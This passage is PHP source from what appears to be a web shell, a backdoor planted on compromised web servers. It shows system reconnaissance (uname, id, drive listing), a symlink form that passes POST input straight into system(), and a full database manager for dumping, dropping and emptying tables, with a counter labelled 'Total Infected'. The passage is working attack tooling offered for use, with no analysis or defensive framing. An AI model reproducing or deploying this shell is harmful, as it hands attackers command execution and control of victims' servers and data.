  1113. TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: transparent; COLOR: green; font-family:Arial, Helvetica, sans-serif;}
  1114. A { font-weight: normal; COLOR: #ff6600; font-family:Arial, Helvetica, sans-serif; TEXT-DECORATION: none;}
  1115. A:unknown { FONT-WEIGHT: normal; COLOR: #ff6600; FONT-FAMILY: verdana; TEXT-DECORATION: none;}
  1116. A.Links { COLOR: #ff6600; TEXT-DECORATION: none;}
  1117. A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ff6600; TEXT-DECORATION: none;}
  1118. A:hover { COLOR: #990000; TEXT-DECORATION: bold;}
  1119. .skin0 { position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}
  1120. .skin1 { cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface; visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}
  1121. .menuitems { padding-left:15px; padding-right:10px;}
  1122. input { background-color: transparent; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1123. textarea { background-color: transparent; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1124. button { background-color: #990000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1125. select { background-color: #990000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1126. option { background-color: #990000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1127. iframe { background-color: #990000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1128. p { MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150% }
  1129. blockquote { font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em;
  1130. margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: transparent; }
  1131. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px; }
  1132. #dragon { position:absolute; z-index:99; top:-1px; right:20px; }
  1133. #footer { text-align:center; color:#990000; font-size:8px; text-transform:uppercase; letter-spacing:.15em; }
  1134. </style></head>
  1135. <BODY text=#99000 bottomMargin=0 bgColor=transparent leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center>
  1136. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#990000 cellPadding=5 width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1px dotted #990000>
  1137. <tr><th width="127" height="95" nowrap valign="top" colspan="2"><p><center><img src="http://www.blackhat.com/images/head-bg.png"></p></center>
  1138. <div id="dragon"><img src="http://i51.tinypic.com/24xp7av.png" alt="" /></div>
  1139. </th></tr>
  1140. <tr><td>
  1141.     <p align="left"><? echo date ("d-m-Y H:i:s")." "; ?></p>
  1142.     <p align="left">Software: <?php echo $DISP_SERVER_SOFTWARE; ?> &#47; <?php echo get_status(); ?></p>
  1143.     <p align="left">uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?> </p>
  1144.     <p align="left"><?php if (!$win) {echo wordwrap(o2xdaexec("id"),90,"<br>",1); } else { echo get_current_user();} ?> </p>
  1145.     <p align="left">safe_mode: <?php echo $hsafemode; ?></p>
  1146.     <p align="left"><?php
  1147. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1148. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  1149. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1150. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1151. $d = str_replace("\\\\","\\",$d);
  1152. $dispd = htmlspecialchars($d);
  1153. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  1154. $i = 0;
  1155. foreach($pd as $b)
  1156. {
  1157.  $t = "";
  1158.  $j = 0;
  1159.  foreach ($e as $r)
  1160.  {
  1161.   $t.= $r.DIRECTORY_SEPARATOR;
  1162.   if ($j == $i) {break;}
  1163.   $j++;
  1164.  }
  1165.  echo "<a href=\"".$surl."xtux=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>";
  1166.  $i++;
  1167. }
  1168. echo "&nbsp;&nbsp;&nbsp;";
  1169. if (is_writable($d))
  1170. {
  1171.     $wd = TRUE;
  1172.     $wdt = "<font color=green>[ OK ]</font>";
  1173.     echo "<font color=green>".view_perms(fileperms($d))."</font>"; } else {
  1174.     $wd = FALSE;
  1175.     $wdt = "<font color=red>[ Read Only ]</font>";
  1176.     echo "".view_perms_color($d)."";
  1177. }
  1178. if (is_callable("disk_free_space"))
  1179. {
  1180.  $free = disk_free_space($d);
  1181.  $total = disk_total_space($d);
  1182.  if ($free === FALSE) {$free = 0;}
  1183.  if ($total === FALSE) {$total = 0;}
  1184.  if ($free < 0) {$free = 0;}
  1185.  if ($total < 0) {$total = 0;}
  1186.  $used = $total-$free;
  1187.  $free_percent = round(100/($total/$free),2);
  1188.  echo "<br />Filesystem Mounted: ".view_size($free)." of ".view_size($total)." (".$free_percent."%)";
  1189. }
  1190. echo "";
  1191. echo "<br/>ifconfig : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a>";
  1192. $letters = "";
  1193. if ($win)
  1194. {
  1195. $v = explode("\\",$d);
  1196. $v = $v[0];
  1197.     foreach (range("a","z") as $letter)
  1198.   {
  1199. $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  1200.     if (!$bool) {$bool = is_dir($letter.":\\");}
  1201.     if ($bool)
  1202.   {
  1203. $letters .= "<a href=\"".$surl."xtux=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure this is correct.')\"":"").">[ ";
  1204.     if ($letter.":" != $v) {$letters .= $letter; } else {
  1205. $letters .= "<font color=green>".$letter."</font>";}
  1206. $letters .= " ]</a> ";
  1207.   }
  1208.  }
  1209. if (!empty($letters)) {echo "Detected drives: ".$letters."<br>";}
  1210. }
  1211. if (count($quicklaunch) > 0)
  1212. {
  1213.  foreach($quicklaunch as $item)
  1214.  {
  1215.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1216.   $item[1] = str_replace("%sort",$sort,$item[1]);
  1217.   $v = realpath($d."..");
  1218.   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  1219.   $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1220.   echo "<a href=\"".$item[1]."\">".$item[0]."</a> &#124; ";
  1221.  }
  1222. }
  1223. echo "</p></td></tr></table>";
  1224. if ((!empty($donated_html)) and (in_array($xtux,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=1 borderColorDark=#990000 cellPadding=3 width=\"95%\" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td width=\"95%\" valign=\"top\">".$donated_html."</td></tr></table>";}
  1225. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=1 borderColorDark=#990000 cellPadding=2 width=\"95%\" bgcolor= transparent borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  1226. if ($xtux == "") {$xtux = $dspact = "ls";}
  1227. if ($xtux == "symlink") {
  1228. echo $ndas.''.$end;exit; }
  1229. if ($_POST['ad1syp'] && $_POST['ad2syp']){
  1230. if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
  1231. print("<blink>Symlink Worked !</blink>");
  1232. }else{
  1233. print("Symlink Not Worked !");
  1234. }}
  1235. if ($_POST['ad1syc'] && $_POST['ad2syc']){
  1236. if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
  1237. print("<blink>Symlink Worked !</blink>");
  1238. }else{
  1239. print("Symlink Not Worked !");}
  1240. }
  1241. if ($act == "sql") {
  1242. $sql_surl = $surl."act=sql";
  1243. if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  1244. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  1245. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  1246. if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  1247. if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  1248. $sql_surl .= "&";
  1249. ?><h3>Welcome to SQL Manager.</h3>
  1250. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#990000 cellPadding=5 width="100%" bgcolor=transparent borderColorLight=#c0c0c0 border=1 bordercolor="#990000"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  1251. if ($sql_server)
  1252. {
  1253.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  1254.   $err = mysql_smarterror();
  1255.   @mysql_select_db($sql_db,$sql_sock);
  1256.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  1257. } else {
  1258. $sql_sock = FALSE;}
  1259. echo "SQL Manager <br />";
  1260. if (!$sql_sock)
  1261. {
  1262. if (!$sql_server) {echo "NO CONNECTION";} else {
  1263. echo "<center>Can't connect</center>"; echo "".$err."";}
  1264. } else {
  1265.   $sqlquicklaunch = array();
  1266.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  1267.   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  1268.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  1269.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  1270.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  1271.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  1272.   echo "<center>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
  1273. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1274. echo "</center>";
  1275. }
  1276. echo "</td></tr><tr>";
  1277. if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost<li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;Please, fill the form:<table><tr><td>Username</td><td>Password&nbsp;</td><td>Database&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td>Host</td><td>PORT</td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php
  1278. } else {
  1279. //Start left panel
  1280. if (!empty($sql_db))
  1281. {
  1282. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>">Home</a><hr size="1" noshade><?php
  1283. $result = mysql_list_tables($sql_db);
  1284. if (!$result) {echo mysql_smarterror(); } else {
  1285. echo "---[ <a href=\"".$sql_surl."&\">".htmlspecialchars($sql_db)."</a> ]---<br>";
  1286. $c = 0;
  1287. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a> (".$count_row[0].")</br>"; mysql_free_result($count); $c++;}
  1288. if (!$c) {echo "No tables found in database.";}
  1289.     }
  1290. } else {
  1291. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>">Home</a><hr size="1" noshade><?php
  1292. $result = mysql_list_dbs($sql_sock);
  1293. if (!$result) {echo mysql_smarterror();
  1294. } else {
  1295. ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1296. $c = 0;
  1297. $dbs = "";
  1298. while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1299. echo "<option value=\"\">Databases (".$c.")</option>";
  1300. echo $dbs;
  1301. }
  1302. ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  1303. }
  1304. //End left panel
  1305. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  1306. //Start center panel
  1307. $diplay = TRUE;
  1308. if ($sql_db)
  1309. {
  1310. if (!is_numeric($c)) {$c = 0;}
  1311. if ($c == 0) {$c = "no";}
  1312. echo "<hr size=\"1\" noshade><center>Total Infected ".$c." table(s) - Database (".htmlspecialchars($sql_db).")<br />";
  1313. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1314. echo "</center>";
  1315. $acts = array("","dump");
  1316. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1317.    elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1318.    elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1319.    elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1320.    elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1321.    elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1322.    elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1323.    elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1324.    elseif ($sql_tbl_act == "insert")
  1325.    {
  1326.     if ($sql_tbl_insert_radio == 1)
  1327.     {
  1328.      $keys = "";
  1329.      $akeys = array_keys($sql_tbl_insert);
  1330.      foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1331. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1332. $values = "";
  1333. $i = 0;
  1334. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1335.     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1336.     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1337.     $sql_act = "query";
  1338.     $sql_tbl_act = "browse";
  1339.     } elseif ($sql_tbl_insert_radio == 2) {
  1340.     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1341.     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1342.     $result = mysql_query($sql_query) or print(mysql_smarterror());
  1343.     $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1344.     $sql_act = "query";
  1345.     $sql_tbl_act = "browse";
  1346. }
  1347. }
  1348. if ($sql_act == "query")
  1349. {
  1350. echo "<hr size=\"1\" noshade>";
  1351. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: <br>".$sql_query_error."<br>";}
  1352. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1353. if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\">"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "<br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1354. }
  1355. if (in_array($sql_act,$acts))
  1356. {
  1357. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1">Create new table:<form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1">Dump DB:<form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1358.     if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1359.     if ($sql_act == "newtbl")
  1360.     {
  1361.     echo "";
  1362.     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!<br>";
  1363.     } else {
  1364.     echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason: ".mysql_smarterror();}
  1365.     }
  1366.     elseif ($sql_act == "dump")
  1367.     {
  1368.     if (empty($submit))
  1369.     {
  1370.     $diplay = FALSE;
  1371.     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\">SQL-Dump:<br><br>";
  1372.     echo "DB:&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1373.     $v = join (";",$dmptbls);
  1374.     echo "Only tables (explode \";\")&nbsp;<sup>1</sup>:&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1375.     if ($dump_file) {$tmp = $dump_file;}
  1376.     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1377.     echo "File:&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1378.     echo "Download: &nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1379.     echo "Save to file: &nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1380.     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><sup>1</sup> - all, if empty";
  1381.     echo "</form>";
  1382.     } else {
  1383.     $diplay = TRUE;
  1384.     $set = array();
  1385.     $set["sock"] = $sql_sock;
  1386.     $set["db"] = $sql_db;
  1387.     $dump_out = "download";
  1388.     $set["print"] = 0;
  1389.     $set["nl2br"] = 0;
  1390.     $set[""] = 0;
  1391.     $set["file"] = $dump_file;
  1392.     $set["add_drop"] = TRUE;
  1393.     $set["onlytabs"] = array();
  1394.     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1395.     $ret = mysql_dump($set);
  1396.     if ($sql_dump_download)
  1397.     {
  1398.     @ob_clean();
  1399.     header("Content-type: application/octet-stream");
  1400.     header("Content-length: ".strlen($ret));
  1401.     header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1402.     echo $ret;
  1403.     exit;
  1404.     }
  1405.     elseif ($sql_dump_savetofile)
  1406.     {
  1407.     $fp = fopen($sql_dump_file,"w");
  1408.     if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";
  1409.     } else {
  1410.     fwrite($fp,$ret);
  1411.     fclose($fp);
  1412.     echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; }
  1413.     } else {
  1414.     echo "Dump: nothing to do!";}
  1415.     }
  1416.    }
  1417.    if ($diplay)
  1418.    {
  1419.     if (!empty($sql_tbl))
  1420.     {
  1421.      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1422.      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1423.      $count_row = mysql_fetch_array($count);
  1424.      mysql_free_result($count);
  1425.      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1426.      $tbl_struct_fields = array();
  1427.      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1428.      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1429.      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1430.      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1431.      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1432.     $perpage = $sql_tbl_le - $sql_tbl_ls;
  1433.     if (!is_numeric($perpage)) {$perpage = 10;}
  1434.     $numpages = $count_row[0]/$perpage;
  1435.     $e = explode(" ",$sql_order);
  1436.     if (count($e) == 2)
  1437.     {
  1438.     if ($e[0] == "d") {$asc_desc = "DESC";
  1439.     } else {
  1440.     $asc_desc = "ASC";}
  1441.     $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {
  1442.     $v = "";}
  1443.      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1444.      $result = mysql_query($query) or print(mysql_smarterror());
  1445.      echo "<hr size=\"1\" noshade><center>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</center>";
  1446.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;Structure&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1447.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;Browse&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1448.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;Dump&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1449.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;Insert&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1450.      if ($sql_tbl_act == "structure") {echo "<br><br>Coming sooon!";}
  1451.      if ($sql_tbl_act == "insert")
  1452.      {
  1453.     if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1454.     if (!empty($sql_tbl_insert_radio)) {
  1455.     } else {
  1456.     echo "<br><br>Inserting row into table:<br>";
  1457.     if (!empty($sql_tbl_insert_q))
  1458.     {
  1459.         $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1460.         $sql_query .= " WHERE".$sql_tbl_insert_q;
  1461.         $sql_query .= " LIMIT 1;";
  1462.         $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1463.         $values = mysql_fetch_assoc($result);
  1464.         mysql_free_result($result);} else {
  1465.     $values = array();}
  1466.     echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#990000 cellPadding=5 width=\"1%\" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td>Field</td><td>Type</td><td>Function</td><td>Value</td></tr>";
  1467.        foreach ($tbl_struct_fields as $field)
  1468.        {
  1469.         $name = $field["Field"];
  1470.         if (empty($sql_tbl_insert_q)) {$v = "";}
  1471.         echo "<tr><td>".htmlspecialchars($name)."</td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1472.         $i++;
  1473.        }
  1474.        echo "</table><br>";
  1475.        echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo ">Insert as new row";
  1476.        if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked>Save"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
